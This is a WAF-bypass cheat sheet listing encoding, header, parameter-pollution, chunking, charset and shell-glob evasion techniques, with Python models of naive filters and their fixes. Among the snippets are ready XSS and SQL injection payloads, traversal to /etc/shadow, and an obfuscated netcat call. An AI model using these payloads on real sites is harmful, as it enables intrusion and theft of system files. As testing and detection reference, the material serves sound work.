# WAF Bypass

If a WAF is present, a request such as `https://example.com/?p4yl04d3=<script>alert(document.cookie)</script>` is blocked outright (typically a 403 or a vendor block page) instead of reaching the application.

## Detection Methods

* **Signature-based Detection:** Matches incoming traffic against known attack patterns.
* **Behavioral Analysis:** Observes traffic behavior for anomalies that may indicate an attack.
* **Rule-based Detection:** Applies predefined rules to block suspicious activity.

## Identifying

1. HTTP Response Headers

```
Server, X-Powered-By, or X-Security
```

2. Error Messages
3. Behavioral Analysis

## Tools for Identifying

1. wafw00f
2. whatwaf
3. nmap

```bash
nmap --script=http-waf-fingerprint,http-waf-detect -p443 example.com
```

## Obfuscation Techniques

### 1. URL Encoding

Original payload: `<script>alert("XSS")</script>`

URL-encoded: `%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E`

The server URL-decodes the parameter before the application sees it, so this only beats a WAF that matches signatures on the raw request without decoding first.

### 2. Double Encoding

Percent-encode the `%` of an already encoded payload: `//malicious.com` becomes `%2F%2Fmalicious.com` and then `%252F%252Fmalicious.com`. A WAF that decodes once sees the harmless-looking `%2F%2Fmalicious.com`; a backend that decodes a second time (for example a framework that decodes once at routing and again at parameter access) reconstructs the original.

Double-encoded payload: `%252F%252Fmalicious.com`

### 3. Unicode Encoding

JavaScript string escapes, for payloads that land inside a script context: `<script>` becomes `\u003Cscript\u003E`, and `prompt()` becomes `\u0070r\u006f\u006dpt()` (each `\uXXXX` needs exactly four hex digits).

Overlong UTF-8 for path traversal, where `.` (0x2E) is sent as `%C0%AE` and `/` (0x2F) as `%C0%AF`: `../../etc/shadow` becomes `%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFetc%C0%AFshadow`. Valid UTF-8 forbids two-byte forms for ASCII characters, so this only works against a backend decoder that accepts them while the WAF does not.

### 4. Base64 Encoding

Base64 does not execute by itself, so the decoded string has to be handed to something that evaluates it, such as `eval(atob(...))` inside an event handler.

Original payload: `<img src=x onerror=alert(1)>`

Base64-encoded: `<img src=x onerror=eval(atob('YWxlcnQoMSk='))>` (`YWxlcnQoMSk=` decodes to `alert(1)`)

### 5. Hex Encoding

Every byte percent-encoded, including the letters a plain URL encoder would leave alone: `%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E` decodes to `<script>alert(1)</script>`.
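An added Python example (not code from the original page) that wires sections 1 to 5 together: it produces the hex, double-encoded and overlong-UTF-8 forms shown above, then models a WAF that URL-decodes a fixed number of times before matching and a backend whose decoder accepts overlong sequences. `SIGNATURE`, `waf_blocks` and `lenient_decode` are assumptions made for the demonstration, not any vendor's logic.

```python
import re
import urllib.parse

# Assumed, simplified signature set for the demonstration (not a real vendor rule).
SIGNATURE = re.compile(r"<script>|alert\(|\.\./", re.IGNORECASE)


def url_encode_all(s: str) -> str:
    """Section 5: percent-encode every byte, letters included."""
    return "".join(f"%{b:02X}" for b in s.encode())


def double_encode(s: str) -> str:
    """Section 2: percent-encode, then encode the '%' signs again (%2F -> %252F)."""
    once = urllib.parse.quote(s, safe="")
    return urllib.parse.quote(once, safe="")


def overlong_utf8(s: str, chars: str = "./") -> str:
    """Section 3: two-byte overlong UTF-8 for the ASCII characters listed in `chars`.
    0x2E '.' -> C0 AE, 0x2F '/' -> C0 AF; everything else is left as-is."""
    out = []
    for ch in s:
        out.append(f"%C0%{0x80 | (ord(ch) & 0x3F):02X}" if ch in chars else ch)
    return "".join(out)


def lenient_decode(raw: bytes) -> str:
    """A backend decoder with the historical bug: it accepts overlong C0/C1
    sequences as the ASCII character they encode instead of rejecting them."""
    out, i = [], 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] < 0xC0:
            out.append(chr(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(raw[i]))
            i += 1
    return "".join(out)


def waf_blocks(query_value: str, decode_passes: int = 1) -> bool:
    """Model of a WAF that URL-decodes `decode_passes` times and then matches.
    Work on bytes and decode as latin-1 so non-UTF-8 bytes survive one-to-one."""
    data = query_value.encode("latin-1")
    for _ in range(decode_passes):
        data = urllib.parse.unquote_to_bytes(data)
    return SIGNATURE.search(data.decode("latin-1")) is not None


def backend_sees(query_value: str) -> str:
    """What the application receives: one URL-decode, then the lenient decoder."""
    return lenient_decode(urllib.parse.unquote_to_bytes(query_value))


if __name__ == "__main__":
    xss = '<script>alert(1)</script>'
    trav = "../../etc/shadow"
    for label, enc in [("hex", url_encode_all(xss)),
                       ("double", double_encode(xss)),
                       ("overlong", overlong_utf8(trav))]:
        print(f"{label:8} 1 pass: {waf_blocks(enc, 1)!s:5} "
              f"2 passes: {waf_blocks(enc, 2)!s:5} backend: {backend_sees(enc)}")
```

The single-pass WAF catches the hex form but not the double-encoded one, and it never sees `../` in the overlong form even though `backend_sees` returns `../../etc/shadow`. The practical check is the decode depth: a WAF should decode at least as many times as the stack behind it does, and reject overlong sequences rather than tolerate them.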

### 6. Chunked Encoding

Send the body with `Transfer-Encoding: chunked` and split the payload across chunk boundaries. A WAF that applies signatures per chunk, or does not de-chunk the body before inspection, never sees `<script>` in one piece, while the origin reassembles it.
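An added Python example (not from the original page) that builds a chunked body with the payload cut across chunks, parses it back the way an HTTP/1.1 server does, and compares a WAF that matches per chunk with one that de-chunks first. The `SIGNATURE` regex and the two `waf_matches_*` models are assumptions for the demonstration.

```python
import re
from typing import Iterator, List

# Assumed signature for the demonstration.
SIGNATURE = re.compile(rb"<script>", re.IGNORECASE)


def chunk_body(payload: bytes, sizes: List[int]) -> bytes:
    """Encode `payload` as a Transfer-Encoding: chunked body, cutting it at the given
    chunk sizes; whatever is left goes into a final chunk before the 0 terminator."""
    out, pos = [], 0
    for n in sizes:
        if pos >= len(payload):
            break
        piece = payload[pos:pos + n]
        out.append(b"%x\r\n%s\r\n" % (len(piece), piece))
        pos += n
    if pos < len(payload):
        rest = payload[pos:]
        out.append(b"%x\r\n%s\r\n" % (len(rest), rest))
    out.append(b"0\r\n\r\n")
    return b"".join(out)


def iter_chunks(raw: bytes) -> Iterator[bytes]:
    """Parse a chunked body as a server does: hex size line (chunk extensions after
    ';' ignored), data, CRLF, repeated until the zero-size chunk."""
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return
        yield raw[pos:pos + size]
        pos += size + 2


def dechunk(raw: bytes) -> bytes:
    """The body the origin reassembles."""
    return b"".join(iter_chunks(raw))


def waf_matches_per_chunk(raw: bytes) -> bool:
    """A WAF that runs its signatures over each chunk's data separately."""
    return any(SIGNATURE.search(chunk) for chunk in iter_chunks(raw))


def waf_matches_reassembled(raw: bytes) -> bool:
    """A WAF that de-chunks first, as the origin does."""
    return SIGNATURE.search(dechunk(raw)) is not None


if __name__ == "__main__":
    body = chunk_body(b"comment=<script>alert(1)</script>", [11, 3, 5])
    print(body)
    print("per chunk:", waf_matches_per_chunk(body),
          " reassembled:", waf_matches_reassembled(body))
```

With the cut points `[11, 3, 5]` the chunks are `comment=<sc`, `rip`, `t>ale` and `rt(1)</script>`; none contains `<script>`, but the reassembled body does. The parser also tolerates chunk extensions (`5;ext=1`), which a less careful inspector may choke on.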

### 7. HTTP/2 and HTTP/3 Features

Headers are compressed in HTTP/2 (HPACK) and HTTP/3 (QPACK), so a WAF that only understands HTTP/1.1 text, or that forwards HTTP/2 frames to the origin without decoding them, does not see the header values it is supposed to inspect. A WAF that terminates the HTTP/2 connection itself decompresses the headers before applying its rules, so check which protocol the WAF actually terminates before relying on this.

### 8. HTTP Parameter Pollution

Payload: `?id=1&id=2`

Backends disagree on which copy of a repeated parameter counts: ASP.NET concatenates them (`1,2`), PHP takes the last (`2`), Java servlets take the first (`1`). A WAF that inspects each value separately can be beaten by spreading one payload over several copies of the parameter so that only the backend's merged value contains the attack string.
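An added Python example (not from the original page) that resolves a repeated parameter under the three documented policies and shows a split `UNION SELECT` that is harmless per value but complete once a comma-concatenating backend merges it. `SQLI_SIG` and the two `waf_flags_*` models are assumptions for the demonstration.

```python
import re
from urllib.parse import parse_qsl

# Assumed signature for the demonstration.
SQLI_SIG = re.compile(r"union\s+select", re.IGNORECASE)


def comments_to_space(s: str) -> str:
    """MySQL treats /* ... */ as whitespace, so do the same before matching."""
    return re.sub(r"/\*.*?\*/", " ", s, flags=re.S)


def backend_value(query: str, name: str, policy: str) -> str:
    """Resolve a repeated parameter the way different stacks do (documented
    behaviour): 'first' (Java servlets), 'last' (PHP), 'concat' (ASP.NET, comma-joined)."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]
    if policy == "first":
        return values[0]
    if policy == "last":
        return values[-1]
    if policy == "concat":
        return ",".join(values)
    raise ValueError(f"unknown policy {policy!r}")


def waf_flags_each_value(query: str) -> bool:
    """A WAF that inspects every occurrence of a parameter on its own."""
    return any(SQLI_SIG.search(comments_to_space(v))
               for _, v in parse_qsl(query, keep_blank_values=True))


def waf_flags_resolved(query: str, name: str, policy: str) -> bool:
    """A WAF (or the application) looking at the value the backend will actually use."""
    return SQLI_SIG.search(comments_to_space(backend_value(query, name, policy))) is not None


if __name__ == "__main__":
    # The page's example plus a split injection: each copy of `id` is harmless alone,
    # but a comma-concatenating backend turns the pair into `1 union select 1,2,3`.
    for q in ["id=1&id=2", "id=1/**/union/*&id=*/select+1,2,3"]:
        for policy in ("first", "last", "concat"):
            v = backend_value(q, "id", policy)
            print(f"{q:40} {policy:6} -> {v!r:35} flagged: {waf_flags_resolved(q, 'id', policy)}")
        print("per-value inspection flags it:", waf_flags_each_value(q))
```

The comma that ASP.NET inserts lands inside `/*,*/`, so the comment swallows it and the query parses as `1 union select 1,2,3`. The defensive check is to inspect the value as the target backend will resolve it, which means knowing the backend's duplicate-parameter policy.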

### 9. HTTP Header Injection

Extra request headers that a backend or a front-end proxy may trust. `X-Original-URL` and `X-Rewrite-URL` can make the application route to a path other than the one the WAF inspected; `Referer`, `X-Forwarded-Host` and `X-Host` are used by some applications for origin and host checks; the remaining headers claim a client IP address and defeat IP-based allow or deny rules on any component that reads them without checking that the request came through a trusted proxy.

```http
X-Original-URL: 
X-Rewrite-URL: 
X-Forwarded-For: 
Referer: 
X-Forwarded-Host: 
X-Host: 
X-Originating-IP: 
X-Remote-IP: 
X-Client-IP: 
X-Remote-Addr: 
```
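An added Python example (not from the original page) showing why the client-IP headers above work and what the correct check looks like: a naive resolver believes whatever header arrives, while the trusted resolver only honours `X-Forwarded-For` hops appended by its own proxies. The `TRUSTED_PROXIES` and `ADMIN_ALLOWLIST` ranges are assumed deployment values.

```python
from ipaddress import ip_address, ip_network

# Assumed deployment: our own reverse proxies live in 10.0.0.0/8, and an admin
# endpoint is allow-listed to loopback and the office LAN.
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]
ADMIN_ALLOWLIST = [ip_network("127.0.0.1/32"), ip_network("192.168.0.0/16")]
SPOOFABLE = ("X-Forwarded-For", "X-Client-IP", "X-Originating-IP", "X-Remote-IP", "X-Remote-Addr")


def client_ip_naive(headers: dict, peer_ip: str) -> str:
    """The bug: believe the first client-IP-looking header, whoever sent it."""
    for name in SPOOFABLE:
        if name in headers:
            return headers[name].split(",")[0].strip()
    return peer_ip


def client_ip_trusted(headers: dict, peer_ip: str) -> str:
    """Walk backwards from the TCP peer: skip hops that are our own proxies and stop
    at the first address that is not. If the peer is not a trusted proxy, every
    forwarded header is ignored. Only X-Forwarded-For is consulted: the other
    headers are never appended to by proxies and carry no trust at all."""
    xff = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in [peer_ip] + list(reversed(xff)):  # a malformed hop raises ValueError: reject the request
        if not any(ip_address(hop) in net for net in TRUSTED_PROXIES):
            return hop
    return peer_ip  # every hop was one of our proxies: treat as internal traffic


def admin_allowed(ip: str) -> bool:
    return any(ip_address(ip) in net for net in ADMIN_ALLOWLIST)


if __name__ == "__main__":
    # Constructed request: attacker at 203.0.113.7 connects directly and claims loopback.
    hdrs = {"X-Forwarded-For": "127.0.0.1"}
    for fn in (client_ip_naive, client_ip_trusted):
        ip = fn(hdrs, "203.0.113.7")
        print(f"{fn.__name__:18} -> {ip:12} admin allowed: {admin_allowed(ip)}")
```

The naive resolver lets the direct connection through as `127.0.0.1`; the trusted one sees `203.0.113.7` because the peer is not a proxy of ours, and when the request does arrive via a proxy it takes the address the proxy appended last, not the one the attacker wrote first.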

### 10. Time-Based Attacks

When the WAF filters on the content of the response (error text, leaked data) rather than on the request, blind SQL injection that delays the query still works: the only signal is response time, which the WAF does not filter.

### 11. Out-of-Band Techniques

Make the server resolve or request an attacker-controlled domain, so the result leaves through DNS or HTTP from the server itself instead of through the response the WAF inspects.

### 12. SQL Injection Obfuscation

Original SQL payload: `' OR 1=1 --`

Obfuscated payload: `' OR 1 /*comment*/ = 1 --` (inline comments act as whitespace in MySQL, so the query still parses while the `1=1` token sequence a signature expects is gone)

### 13. Cross-Site Scripting Obfuscation

Original XSS payload: `<script>alert(1)</script>`

Obfuscated payload: `<s%63ript>alert(1)</s%63ript>` (`%63` is `c`; the server URL-decodes the parameter, so this only beats a WAF that matches on the raw query string)

### 14. Comment Technique

```
<!--><script>confirm/**/()/**/</script>
/?id=1+un/**/ion+sel/**/ect+1,2--
```

### 15. Wildcard Obfuscation Technique

The shell expands globs before the command runs, so the filename never appears literally in the request; a decimal IP literal does the same for addresses, since `inet_aton` accepts `2130706433` for `127.0.0.1`.

`/etc/passwd`  :   `/???/??ss??`

`/bin/nc 127.0.0.1 443`  :    `/???/n? 2130706433 443`
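An added Python example (not from the original page) of the normalisation a detector needs for this section: expand the glob against a watchlist of sensitive paths with `fnmatch` (the same `?`/`*` rules as shell pathname expansion) and turn decimal IP literals back into dotted quads before matching. The watchlist, `NAIVE_SIG` and the `2**24` lower bound for treating an integer as an address are assumptions for the demonstration.

```python
import fnmatch
import ipaddress
import re
from typing import List, Optional

# Assumed watchlist and a deliberately naive literal signature for the demonstration.
SENSITIVE_PATHS = ["/etc/passwd", "/etc/shadow", "/bin/nc", "/bin/sh", "/bin/cat"]
NAIVE_SIG = re.compile(r"/etc/(passwd|shadow)|/bin/(nc|sh)|127\.0\.0\.1")


def glob_expansions(token: str) -> List[str]:
    """Which watchlisted paths a shell glob such as /???/??ss?? would expand to."""
    return [p for p in SENSITIVE_PATHS if fnmatch.fnmatchcase(p, token)]


def decimal_ip(token: str) -> Optional[str]:
    """'2130706433' -> '127.0.0.1'. Integers below 2**24 (assumed cut-off) are left
    alone so that ports such as 443 are not rewritten; inet_aton also accepts hex
    (0x7f000001) and octal (0177.0.0.1) forms, which are not handled here."""
    if token.isdigit() and 2 ** 24 <= int(token) < 2 ** 32:
        return str(ipaddress.IPv4Address(int(token)))
    return None


def normalise_command(cmd: str) -> str:
    """Rewrite each token to the literal a signature expects: globs to the
    watchlisted path they match, decimal integers to dotted-quad addresses."""
    out = []
    for tok in cmd.split():
        hits = glob_expansions(tok)
        ip = decimal_ip(tok)
        if hits:
            out.append(hits[0])
        elif ip:
            out.append(ip)
        else:
            out.append(tok)
    return " ".join(out)


def flagged(cmd: str) -> bool:
    return NAIVE_SIG.search(normalise_command(cmd)) is not None


if __name__ == "__main__":
    for cmd in ["/???/n? 2130706433 443", "cat /???/??ss??"]:
        print(f"{cmd:28} raw match: {bool(NAIVE_SIG.search(cmd))!s:5} "
              f"normalised: {normalise_command(cmd)!r} -> flagged: {flagged(cmd)}")
```

The raw signature misses both page payloads; after normalisation they read `/bin/nc 127.0.0.1 443` and `cat /etc/passwd` and are caught. A real filesystem has far more matches for `/???/??ss??` than a watchlist does, which is exactly why the attacker's glob works.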

### 16. Junk Characters

```html
<script>+-+-1-+-+confirm()</script>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
```

### 17. Line Breaks

`%0A` is decoded by the server to a raw line feed when the value is reflected, and the browser's URL parser strips tab and newline characters before recognising the scheme, so `javascript:` is reassembled in the browser while never appearing contiguously in the request:

```html
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(1)">
```

### 18. Uninitialized Variables

`$u` is not set, so the shell expands it to an empty string: the command runs as `/bin/cat /etc/shadow` while the request never contains that string.

```bash
/bin/cat$u /etc/shadow$u
```

### 19. Tabs and Line Feeds

Raw tab (0x09) and line-feed (0x0A) characters inside the URL are stripped by the browser's URL parser before the scheme is recognised, so the string `javascript:` never appears intact in the request. The spaces below stand for those control characters, which can also be written as the entities `&#x09;` and `&#x0A;`.

```html
<IMG SRC=" javascript:confirm();">
<IMG SRC=" jav ascri pt:confirm ();">
```

### 20. Charset

Declare a different charset in the `Content-Type` header (e.g. `ibm500`, an EBCDIC code page) and encode the body in it. A WAF that reads the bytes as ASCII sees nothing resembling `<script>`; a framework that honours the declared charset decodes the same bytes back to the payload.

**Python code for IBM500 encoding** (Python accepts `IBM500` and `IBM037` as codec names; both EBCDIC code pages produce the same bytes for the characters used here):

```python
>>> import urllib.parse
>>> s = '<script>alert("xss")</script>'
>>> urllib.parse.quote_plus(s.encode("IBM500"))
'L%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa%A2%83%99%89%97%A3n'
```

**Encoded payload:**

```http
POST /comment/post HTTP/1.1
Host: chatapp
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 75

L%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa%A2%83%99%89%97%A3n
```
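An added Python example (not from the original page) that reproduces the encoded body above and then shows both sides of the mismatch: a WAF matching the form-decoded bytes as ASCII, and a backend decoding them with the charset taken from `Content-Type`. `XSS_SIG` and the two `waf_sees_attack*` models are assumptions for the demonstration.

```python
import re
from urllib.parse import quote_plus, unquote_to_bytes

# Assumed signature for the demonstration; real rule sets are larger but share the
# assumption that the body is ASCII/UTF-8 text.
XSS_SIG = re.compile(rb"<script", re.IGNORECASE)


def encode_body(payload: str, charset: str = "cp500") -> str:
    """Encode the payload in the declared legacy charset, then form-encode the bytes.
    'cp500' is Python's name for IBM500 (the alias 'IBM500' also works)."""
    return quote_plus(payload.encode(charset))


def charset_from_content_type(content_type: str) -> str:
    m = re.search(r"charset=([\w-]+)", content_type, re.IGNORECASE)
    return m.group(1) if m else "utf-8"


def backend_decodes(body: str, content_type: str) -> str:
    """A framework that honours the declared charset recovers the original text.
    An unknown charset raises LookupError, which a backend should treat as a reject."""
    return unquote_to_bytes(body).decode(charset_from_content_type(content_type))


def waf_sees_attack(body: str) -> bool:
    """A WAF that form-decodes the body but matches it as ASCII bytes."""
    return XSS_SIG.search(unquote_to_bytes(body)) is not None


def waf_sees_attack_charset_aware(body: str, content_type: str) -> bool:
    """The fix: decode with the declared charset (or reject unexpected charsets)
    before matching, the same way the backend will."""
    text = backend_decodes(body, content_type)
    return XSS_SIG.search(text.encode("utf-8")) is not None


if __name__ == "__main__":
    ct = "application/x-www-form-urlencoded; charset=ibm500"
    body = encode_body('<script>alert("xss")</script>')
    print(body)
    print("ascii WAF:", waf_sees_attack(body),
          " charset-aware WAF:", waf_sees_attack_charset_aware(body, ct),
          " backend:", backend_decodes(body, ct))
```

The bytes the WAF matches against start with `L` (0x4C, which is `<` in EBCDIC) and contain no ASCII `<script`; the backend's `decode("ibm500")` returns the full payload. Rejecting bodies whose declared charset the application does not actually need is the simpler fix.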

### 21. Content Size

Some cloud-based WAFs skip inspection, or inspect only the first part of the request, once the body or URL exceeds a size limit. Padding the request with harmless parameters before the payload can push it past that limit or outside the inspected window; the application still parses the whole request.

### 22. Unicode Compatibility

* <https://shahidulandshamim.gitbook.io/web-application/exploitation/unicode-injection-and-weaponising>
* <https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2#4.Unicode%20Compatibility>

### 23. IP Rotation

For WAFs that rate-limit or block by source address, route each request through a different cloud egress IP.

* <https://github.com/ustayready/fireprox>: Generates an API gateway URL to be used with ffuf
* <https://github.com/rootcathacking/catspin>: Similar to fireprox
* <https://github.com/PortSwigger/ip-rotate>: Burp Suite plugin that uses API gateway IPs
* <https://github.com/fyoorer/ShadowClone>: Splits the input file into chunks and runs them in parallel across a dynamically determined number of container instances (for example, a 10,000-line input with a split factor of 100 lines yields 100 chunks on 100 instances)

### 24. HTML Encoding

```
&lt;script&gt;alert(1)&lt;/script&gt;
```

### 25. String Concatenation

```
'SEL' + 'ECT'
```

### 26. Case Manipulation

`<script>` :  `<sCRiPt>`

`SELECT` :  `sEleCt`
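An added Python example (not from the original page) covering sections 12, 13, 14, 24, 25 and 26 from the detection side: one normaliser that URL-decodes, HTML-unescapes, turns inline comments into whitespace, removes `' + '` string concatenation, collapses whitespace and lowercases, run over the page's own obfuscated payloads. The `SIGNATURES` set and the assumption that the value has already been form-decoded (`+` already a space) are mine.

```python
import html
import re
from urllib.parse import unquote

# Assumed, deliberately small signature set for the demonstration.
SIGNATURES = {
    "xss": re.compile(r"<script>|on\w+\s*=\s*\w+\("),
    "sqli": re.compile(r"\bor\s+1\s*=\s*1\b|\bunion\s+select\b"),
}


def normalise(value: str) -> str:
    """Undo the layers sections 12-14 and 24-26 rely on. `value` is assumed to be
    the parameter value after form decoding ('+' already turned into a space)."""
    s = unquote(value)                              # <s%63ript> -> <script>
    s = html.unescape(s)                            # &lt;script&gt; -> <script>
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)    # /*comment*/ is whitespace to MySQL
    s = re.sub(r"'\s*\+\s*'", "", s)                # 'SEL' + 'ECT' -> 'SELECT'
    s = re.sub(r"\s+", " ", s).strip()              # collapse runs of whitespace
    return s.lower()                                # sEleCt / <sCRiPt>


def flagged(value: str) -> list:
    """Names of the signatures that match once the value is normalised."""
    s = normalise(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(s)]


if __name__ == "__main__":
    samples = [
        "<s%63ript>alert(1)</s%63ript>",
        "&lt;script&gt;alert(1)&lt;/script&gt;",
        "<!--><script>confirm/**/()/**/</script>",
        "' OR 1 /*comment*/ = 1 --",
        "'SEL' + 'ECT'",
        "<sCRiPt>",
    ]
    for v in samples:
        print(f"{v:42} -> {normalise(v)!r:32} {flagged(v)}")
```

Each step corresponds to one obfuscation on the page; the order matters (URL-decode before HTML-unescape, comments before whitespace collapsing), and the same normaliser that makes the signatures match is what a WAF must apply before its rules, because the backend performs these decodings whether the WAF does or not.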

### 27. H2C Smuggling

## Resources

* <https://github.com/0xInfection/Awesome-WAF>
* <https://medium.com/@bootstrapsecurity/how-to-bypass-web-application-firewalls-10cec76e8276>
* <https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2>

